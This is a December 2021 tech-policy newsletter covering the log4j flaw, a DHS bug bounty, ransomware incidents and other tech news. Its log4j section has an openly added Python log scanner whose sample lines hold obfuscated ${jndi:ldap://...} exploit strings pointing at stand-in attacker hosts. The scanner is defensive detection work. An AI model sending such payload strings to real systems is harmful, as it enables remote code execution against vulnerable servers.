Hillicon Valley – Apache’s vulnerability raises alarm bells

It’s Tuesday. Welcome to Hillicon Valley, detailing everything you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.

Follow The Hill’s cyber reporter Maggie Miller (@magmill95) and tech team, Chris Mills Rodrigo (@millsrodrigo) and Rebecca Klar (@rebeccaklar_), for more coverage.

Alarm bells continued to ring on Tuesday as cybersecurity professionals and government officials rushed to address the newly disclosed vulnerability in the Apache log4j logging library, which left organizations around the world exposed to attacks by nation states and cybercriminals.

Meanwhile, the Department of Homeland Security announced a new bug bounty program that lets vetted hackers probe agency systems for vulnerabilities, and Apple said it is once again requiring masks in its stores.

Let’s move on to the news.

The newest cyber puzzle

A vulnerability in a widely used logging library, disclosed late last week, has forced security professionals and officials to scramble to patch systems before hostile nation states and cybercriminals can exploit the flaw.

The vulnerability in the Apache log4j logging library has potentially affected thousands of businesses around the world and is a particularly serious issue.

Big impact: “This is one of the worst vulnerabilities in vulnerability history,” Tom Kellermann, a former member of an Obama administration cybersecurity commission and head of cybersecurity strategy at VMware, told The Hill on Monday.

The vulnerability, first disclosed at the end of last week, is serious because it sits in a library that is embedded in business systems around the world and has been in use for roughly two decades.

“Think of Apache as one of the legs, one of the giant supports of a bridge that facilitates connective tissue between application worlds and computing environments,” Kellermann said. “If you could poison this medium, which is basically what our adversaries are doing right now, because you have active scanning and exploitation of this vulnerability, you could essentially destabilize these bridges.”

Ouch: Attackers are actively exploiting the flaw, with Check Point Software reporting Monday afternoon that it had witnessed a “pandemic-like spread” since last week, with more than 800,000 attempted attacks in 72 hours and around 100 exploitation attempts per minute. Check Point said more than 40 percent of corporate networks around the world had been targeted.
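The newsletter does not describe how the flaw is triggered, so the following is an added example rather than anything from The Hill, Check Point or the Apache project. It assumes the publicly documented mechanism of the log4j bug (tracked as CVE-2021-44228): an attacker places a `${jndi:...}` lookup string in any input the target application logs, such as a User-Agent header, and vulnerable log4j versions resolve it over LDAP, RMI or similar. Scanners of the kind Check Point counted commonly disguise the string with nested lookups (`${lower:j}`, `${::-j}`) and URL-encoding, so the scanner below normalizes those before matching. The access-log lines, hostnames and IP addresses are constructed for the example.

```python
"""Scan web-server access-log lines for log4j 2 lookup strings of the kind used
in the December 2021 log4j exploitation wave.  Added example; the log lines,
hostnames and addresses below are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Obfuscation tricks seen in the wild, each rewritten to the text log4j would
# resolve it to:  ${lower:J} -> j,  ${upper:j} -> J,  ${::-j} -> j,
# ${env:NOPE:-j} -> j (default value of an undefined variable).
_LOWER = re.compile(r'\$\{lower:([^}$]*)\}', re.IGNORECASE)
_UPPER = re.compile(r'\$\{upper:([^}$]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[a-z]*:[^}$]*:-([^}$]*)\}', re.IGNORECASE)

# What is left after normalization: "${jndi:<scheme>://<host>..."
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(\w+):/*([^/}:\s]+)', re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL-encoding (single and double) and nested lookups until the
    text stops changing, so "${${lower:j}ndi:" becomes "${jndi:"."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_attempts(lines):
    """Return (line_number, scheme, host) for every line carrying a JNDI lookup.
    The host is the callback server the attacker wants the victim to contact,
    which is the indicator worth blocking and hunting for in outbound logs."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits


# Constructed Apache combined-format log lines: one benign request, three
# exploitation attempts with increasing obfuscation, and one benign-looking
# lookup that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 88 '
    '"-" "${jndi:ldap://attacker.example:1389/a}"',
    '198.51.100.8 - - [13/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${${lower:j}${upper:n}di:${lower:RMI}://evil.example/x}"',
    '198.51.100.9 - - [13/Dec/2021:10:01:05 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j'
    '%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F'
    'c2.example%2Fz%7D HTTP/1.1" 200 17 "-" "curl/7.79"',
    '192.0.2.4 - - [13/Dec/2021:10:01:06 +0000] "GET /docs/${date:yyyy} HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme, host in find_attempts(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup via {scheme} to {host}")
```

Run against real access or application logs, the hits give the callback hosts to block at the egress and to search for in DNS and proxy logs; a JNDI string that was logged is only a problem if the application actually resolved it, so the outbound connection, not the inbound string, is the evidence of compromise.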

The government steps in: Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly announced on Saturday that the log4j vulnerability had been added to the agency’s Known Exploited Vulnerabilities catalog, which requires federal civilian agencies to remediate it, and that CISA’s Joint Cyber Defense Collaborative had set up a senior leadership group to focus on the issue. The group includes partners from the FBI and the National Security Agency (NSA).

“To be clear, this vulnerability poses a severe risk,” Easterly said in a statement on Saturday. “We urge all organizations to join us in this essential effort and take action.”

Read more here.

Feds invite hackers to target DHS

The Department of Homeland Security (DHS) on Tuesday announced a new bug bounty program to help tackle the agency’s cyber vulnerabilities.

The Hack DHS program will allow vetted cybersecurity researchers to look for vulnerabilities in select external DHS systems and be paid by the department if they find any, which will allow DHS to harden its systems against attacks.

The program will run in three phases over the next fiscal year: the first phase involving virtual assessments of DHS systems, the second a live, in-person hacking event, and the third DHS identifying and reviewing lessons learned.

“As the federal government’s cybersecurity quarterback, DHS must lead by example and constantly seek ways to strengthen the security of our own systems,” Secretary of Homeland Security Alejandro Mayorkas said Tuesday in a statement.

“The Hack DHS program incentivizes highly skilled hackers to identify cybersecurity weaknesses in our systems before they can be exploited by bad actors. This program is one example of how the Department is partnering with the community to help protect our nation’s cybersecurity.”

Read more here.


The Virginia General Assembly IT unit was hit by a ransomware attack, which prevented lawmakers and staff from accessing the bill management system.

Alena Yarmosky, a spokesperson for Gov. Ralph Northam (D-Va.), said in a statement on Monday that the cyberattack targeted the legislature’s Division of Legislative Automated Systems, according to The Washington Post.

The division serves the Virginia General Assembly on matters involving “computer technology, the collection and dissemination of legislative information, and the production and distribution of publications,” according to its website, as cited by the Post.

The website remained inaccessible as of Tuesday evening.

Read more here.

Mask up

Apple will require customers to wear masks in all of its U.S. stores as COVID-19 cases increase, the company said on Tuesday.

“We regularly monitor conditions and will adjust our health measures in stores to support the well-being of customers and employees,” an Apple spokesperson said in a statement.

“Amid the increase in cases in many communities, we now require all customers to join our team members in wearing masks when they visit our stores.”

Apple is reinstating the policy as coronavirus cases rise and new variants of the virus, including the highly transmissible omicron variant, spread.

Read more here.


PowerPoint presentations from Chinese telecommunications giant Huawei Technologies indicate that the company is playing a larger role in China’s surveillance efforts than previously thought, according to the Washington Post.

The Post reviewed more than 100 Huawei PowerPoint presentations, many of them marked “confidential,” in which the company explained how the government could use its technologies to identify people by voice, track persons of political interest, and monitor the movements of prison inmates, among other surveillance tactics.

“Huawei has no knowledge of the projects mentioned in the Washington Post report,” the company said in a statement to the newspaper. “Like all other major service providers, Huawei provides cloud platform services that meet common industry standards.”

Read more here.


Ultimate Kronos Group (UKG), a provider of human resources management software, was hit by a ransomware attack earlier this week, the company confirmed.

Kronos executive vice president Bob Hughes confirmed the incident in a blog post published Monday. Hughes said the company became aware of the breach on December 11 and that it affected the Kronos Private Cloud, which hosts UKG Workforce Central, UKG TeleStaff, Healthcare Extensions and Banking Scheduling Solutions.

Hughes warned that while the company works to resolve the incident, Kronos Private Cloud systems could remain unavailable for “several weeks.”

The attack could have a widespread impact on several large companies, as UKG’s customers include Tesla, Marriott, Yamaha, Samsung, Revlon, The Container Store and Peet’s Coffee and Tea.

Read more here.


An editorial to chew on: A powder army in the information age

Lighter click: Really wild race

Notable links on the web:

How Beijing influences influencers (The New York Times / Paul Mozur, Raymond Zhong, Aaron Krolik, Aliza Aufrichtig and Nailah Morgan)

The military is in hot water over its TikTok recruiting activity (The Verge / Makena Kelly)

Amazon delivery drivers say they are sacrificing safety to cope with the rush of the holidays (Vice Motherboard / Lauren Kaori Gurley)

One last thing: a mobile voting system?

The U.S. Postal Service worked on a secret project testing a blockchain-based mobile phone voting system ahead of the 2020 election before finally abandoning the project, according to The Washington Post.

The effort was apparently carried out without any involvement from the agencies focused on election security. According to the Post, the project’s secrecy alarmed officials, who feared that news of it could spark conspiracy theories and fuel mistrust of the U.S. electoral system.

Matt Masterson, a former senior adviser at the Cybersecurity and Infrastructure Security Agency (CISA) who was in the federal government while the mobile voting project was underway, said he was never made aware of the Postal Service’s work on the program.

“If you are doing anything in the election space, transparency should be the number one priority. There should be no guessing game around it,” Masterson told the newspaper.

Read more here.

That’s all for today, thanks for reading. Discover The Hill’s Technology and cybersecurity pages for breaking news and coverage. See you on Wednesday.
